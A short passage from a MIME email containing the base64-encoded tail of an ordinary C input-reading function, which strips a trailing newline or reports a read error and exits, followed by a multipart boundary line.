KSB7DQoJCWlmIChidWZbMF0gPT0gJ1xuJykgew0KCQkJYnVmWzBdID0gJ1ww
JzsNCgkJCXJldHVybjsNCgkJfQ0KCX0NCglwZXJyb3IoInJlYWQiKTsJCS8q
IFhYWCAqLw0KCWV4aXQoLTEpOw0KfQ0K
--0-1228696965-977200565=:23839--
